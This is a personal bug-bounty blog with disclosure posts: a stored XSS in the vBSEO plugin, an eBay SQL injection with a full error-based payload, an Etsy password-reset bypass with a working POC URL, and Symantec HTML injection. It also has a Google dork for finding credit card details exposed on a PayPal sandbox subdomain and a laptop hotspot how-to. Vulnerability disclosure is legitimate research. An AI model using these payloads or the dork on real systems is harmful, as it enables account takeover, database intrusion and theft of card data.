Sunday, April 5, 2015
Monday, January 20, 2014
Quick internet sharing - Laptop to mobile
Posted by Yogesh
Tagged as:
9:59 PM
Hey all,
If you want to share your Laptop internet with your mobile device without using any third party tool & that too in couple of steps, yeah, very quickly ;), then follow the below given steps.
Step 1.
Open Command Prompt, as an Administrator,
Step 2.
Enter below given commands.
Command 1.
netsh wlan set hostednetwork mode=allow ssid=abcd key=10 Digit Key
Note : ssid can be any name which will get displayed as wifi network.
Key can be any 10 Digit numbers. For Ex. 0000000000
Command 2.
netsh wlan start hostednetwork
Step 3.
Go to the properties of your Local Area Connection which is connected to the Internet. Then Click on Sharing tab And select the check box under "Internet connection sharing".
Now Select the network which we created using commands. [here, abcd ]. Click OK
If you want to share your Laptop internet with your mobile device without using any third party tool & that too in couple of steps, yeah, very quickly ;), then follow the below given steps.
Step 1.
Open Command Prompt, as an Administrator,
Step 2.
Enter below given commands.
Command 1.
netsh wlan set hostednetwork mode=allow ssid=abcd key=10 Digit Key
Note : ssid can be any name which will get displayed as wifi network.
Key can be any 10 Digit numbers. For Ex. 0000000000
Command 2.
netsh wlan start hostednetwork
Step 3.
Go to the properties of your Local Area Connection which is connected to the Internet. Then Click on Sharing tab And select the check box under "Internet connection sharing".
Now Select the network which we created using commands. [here, abcd ]. Click OK
Tuesday, December 24, 2013
Cross Site Scripting ( XSS - Stored ) vulnerability in vBulletin SEO Plugin vBSEO
Posted by Yogesh Jaygadkar
Tagged as:
11:07 AM
Exploit Title: Cross Site Scripting ( XSS - Stored ) vulnerability in vBulletin SEO Plugin vBSEO.
Found By: Yogesh Jaygadkar | http://www.jaygadkar.com/
Tested versions: vBSEO 3.2.0 & vBSEO 3.6.0
Tested with: vBulletin 4.0.6 & vBulletin 4.2.1
Vulnerable POST Parameter: sendtrackbacks
vBSEO Plugin for vBulletin contains a flaw that allows a stored cross-site scripting (XSS) attack. This flaw exists because the application does not validate the 'sendtrackbacks' parameter upon submission to the /forum/newreply.php & /forum/newthread.php script. This may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.
POC:
http://www.VictimVBForum.com/forum/newreply.php?do=postreply&t=[Thread ID]
http://www.VictimVBForum.com/forum/newthread.php?do=newthread&f=
In Advanced Reply Or New Thread page, Put your ">vector in "Trackback"
Options.
Submit the Reply. (You can also test it by clicking Preview Post button)
Found By: Yogesh Jaygadkar | http://www.jaygadkar.com/
Tested versions: vBSEO 3.2.0 & vBSEO 3.6.0
Tested with: vBulletin 4.0.6 & vBulletin 4.2.1
Vulnerable POST Parameter: sendtrackbacks
vBSEO Plugin for vBulletin contains a flaw that allows a stored cross-site scripting (XSS) attack. This flaw exists because the application does not validate the 'sendtrackbacks' parameter upon submission to the /forum/newreply.php & /forum/newthread.php script. This may allow an attacker to create a specially crafted request that would execute arbitrary script code in a user's browser within the trust relationship between their browser and the server.
POC:
http://www.VictimVBForum.com/forum/newreply.php?do=postreply&t=[Thread ID]
http://www.VictimVBForum.com/forum/newthread.php?do=newthread&f=
In Advanced Reply Or New Thread page, Put your ">vector in "Trackback"
Options.
Submit the Reply. (You can also test it by clicking Preview Post button)

Done ;)
PayPal : User Credit Card Information Disclosure
Posted by Yogesh
Tagged as:
10:21 AM
Okay... So, here is another one old & duplicate bug from
PayPall, which I reported looooong back.
I have found some strange results of api-3t.sandbox.paypal.com.
This sub domain is storing all credit card information of paypal user in URL. Below
is the google dork for finding such “stored” CC details.
Google Dork: site:sandbox.paypal.com inurl:CVV2=
Google results are not much, nearly 80, but still harmful as
sensitive user information is getting leaked.


Friday, February 22, 2013
Listed in Barracuda Networks Hall of Fame
Posted by Yogesh
Tagged as:
11:28 PM
Listed in Barracuda Networks Security - Hall of Fame.
Thanks :)

Found multiple vulnerabilities in Barracuda security
products. Bugs are still not patched. 'll update the POC once all bugs gets patched
Thanks :)
Wednesday, February 20, 2013
Listed in Google Hall Of Fame
Posted by Yogesh
Tagged as:
11:35 PM
After 2 continues duplicate bugs & 2 Rejections, Google Accepted my 3 bugs...
1 bug is fixed, 2 more in row : D 1st bug did not qualify for a reward so they listed me on their Google Hall of Fame - distinction . But soon I'll be on Reward Recipients page ;)

So, Finally I am listed in Google Hall Of Fame. ‘ll
update the POC once all bugs gets patched
Friday, January 25, 2013
SQL Injection Vulnerability in ebay sub domains
Posted by Yogesh
Tagged as:
10:13 AM
Title: SQL Injection Vulnerability in www.ebay.com
sub domains
Author: Yogesh D Jaygadkar
Reported: December 27, 2012
Fixed: Jan 15, 2013
Public Released: Jan 25, 2013
Thanks To: Darshit Ashara
Greets : Rahul Bro, Aasim, Sandeep, Sagar
Author: Yogesh D Jaygadkar
Reported: December 27, 2012
Fixed: Jan 15, 2013
Public Released: Jan 25, 2013
Thanks To: Darshit Ashara
Greets : Rahul Bro, Aasim, Sandeep, Sagar
Description:
Last Month I reported SQL Injection vulnerabilities in
www.ebay.com sub domains. You can see how many days they
took for patching & allowing me to publish the vulnerability. But finally
they fixed it & listed me in their Researchers Acknowledgement Page.Like every other bounty hunter I was also searching
for some vulnerability in EBAY.That time I have no idea that Ebay don’t give bounty
for any vulnerability. Not even for SQL Injection. :)
POC:
Vulnerable Parameter:
“checkbox” Array
POST parameter.
Search
option in above pages provides a “Select Site” checkboxes which filters the
search result by different countries.
HTTP
Headers:
Host: sea.ebay.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+ xml,application/xml;q=0.9,*/*; q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://sea.ebay.com/ searchAnnoucement.php-time= Jan%202012
Cookie: Cookie Value
Content-Type: application/x-www-form- urlencoded
Content-Length: 16
POST Contents: checkbox%5B%5D=(select+1+and+ row(1%2c1)>(select+count(*)% 2cconcat(CONCAT(CHAR(68)%2C( SELECT+USER())%2CCHAR(65)% 2CCHAR(86)%2CCHAR(73)%2CCHAR( 68))%2c0x3a%2cfloor(rand()*2)) x+from+(select+1+union+select+ 2)a+group+by+x+limit+1))&
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://sea.ebay.com/
Cookie: Cookie Value
Content-Type: application/x-www-form-
Content-Length: 16
POST Contents: checkbox%5B%5D=(select+1+and+
So this is all for submitting report. After that I simply
used sqlmap the gr8 :)
Tuesday, January 8, 2013
Password Reset Vulnerability in etsy.com
Posted by Yogesh
Tagged as:
3:36 AM
Title: Password Reset
Vulnerability in etsy.com
Vuln URL: https://www.etsy.com/confirm.php?email=
Author: Yogesh D Jaygadkar
Reported: December 30, 2012
Fixed: December 30, 2012
Public Released: Jan 08, 2013
Vuln URL: https://www.etsy.com/confirm.php?email=
Author: Yogesh D Jaygadkar
Reported: December 30, 2012
Fixed: December 30, 2012
Public Released: Jan 08, 2013
Description:
In etsy.com, when users reset their password, they receives password reset
link which is as below.
https://www.etsy.com/confirm.php?email=[User Email ID]&code=[Token code]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1
When I received this mail, I started playing with this link. I noticed
that token is not getting validated from server side. So I removed it &
tested with my own id.
Final
POC:
https://www.etsy.com/confirm.php?email=[victim user's email
ID]&action=reset_password&utm_source=account&utm_medium=trans_email&utm_campaign=forgot_password_1
And Password changed successfully.
Thanks to etsy security team for quick reply.
Thanks to my friends : Darshit, sandeep, rahul bro, aasim , sagar
Thanks to my friends : Darshit, sandeep, rahul bro, aasim , sagar
Tuesday, July 3, 2012
HTML Injection in Symantec.com
Posted by Yogesh
Tagged as:
8:03 AM
Title : HTML Injection in Symantec.com
Vuln URL : http://www.symantec.com/business/support/index?page=content&id=
Author : Yogesh D Jaygadkar
Reported : July 02, 2012
Fixed : July 03, 2013
Public Released : July 03, 2013
OS : Win7, Win XP, Ubuntu
Description:
HTML injection is a type of attack focused upon the way HTML content is generated and interpreted by browsers at client side.so if an attacker embeds html/script tags such <html>,
<SCRIPT>
, <OBJECT>
, <APPLET>
, or <EMBED>
into a web site, the web browser's JavaScript engine will execute it.While searching about some anti-virus related information i found that Symantec Antivirus official website is vulnerable to HTML Injection. Attacker can add HTML Tags into URL to execute html code on website.
Screenshot 1 :
Screenshot 2 :
Saturday, June 2, 2012
Listed in Microsoft's Security Researcher Page
Posted by Yogesh
Tagged as:
8:44 PM
finally I'm listed in Security Researcher Acknowledgments for Microsoft Online Services
Thanks to Microsoft & specially Nate from Microsoft for quick response.Thanks to all my friends.
Thanks to Microsoft & specially Nate from Microsoft for quick response.Thanks to all my friends.

Subscribe to:
Posts (Atom)
Popular Posts
-
Title : Password Reset Vulnerability in etsy.com Vuln URL : https://www.etsy.com/confirm.php?email= Author : Yogesh D Jaygadkar...
-
Okay... So, here is another one old & duplicate bug from PayPall , which I reported looooong back. I have found some strange resu...
-
Hey all, If you want to share your Laptop internet with your mobile device without using any third party tool & that too in couple of...
-
Exploit Title: Cross Site Scripting ( XSS - Stored ) vulnerability in vBulletin SEO Plugin vBSEO . Found By: Yogesh Jaygadkar | http://w...
-
Title : SQL Injection Vulnerability in www.ebay.com sub domains Author : Yogesh D Jaygadkar Reported : December 27, 2012 Fixed : Jan ...
-
Great step from PayPal & a Proud moment for me to be listed in PayPal Wall of Fame . :)
-
Title : HTML Injection in Symantec.com Vuln URL : http://www.symantec.com/business/support/index?page=content&id= Author : Yogesh...
-
Listed in Barracuda Networks Security - Hall of Fame. Found multiple vulnerabilities in Barracuda security products. Bugs are ...
-
After 2 continues duplicate bugs & 2 Rejections, Google Accepted my 3 bugs... 1 bug is fixed, 2 more in row : D 1st bug did not qua...
-
finally I'm listed in Security Researcher Acknowledgments for Microsoft Online Services Thanks to Microsoft & specially Nate fro...
Blog Archive
Powered by Blogger.
What they says
Proudly Powered by Blogger.